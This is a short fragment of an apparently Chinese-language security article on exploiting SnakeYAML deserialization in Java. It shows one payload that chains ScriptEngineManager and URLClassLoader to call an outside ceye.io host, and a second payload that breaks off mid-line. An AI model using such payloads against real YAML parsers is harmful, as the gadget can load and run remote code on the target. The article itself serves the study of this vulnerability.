Java安全SnakeYaml组件中类的探测到反序列化在SPI/C3P0/FastJson的利用
# SnakeYAML反序列化漏洞分析与利用
## 反序列化探测技术
### 使用URLClassLoader探测
```java
String poc = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://tcbua9.ceye.io/\"]]]]";
```
### 使用Key调用hashCode方法探测
```java
String poc = "{!!j
2025-08-25 21:58:07
0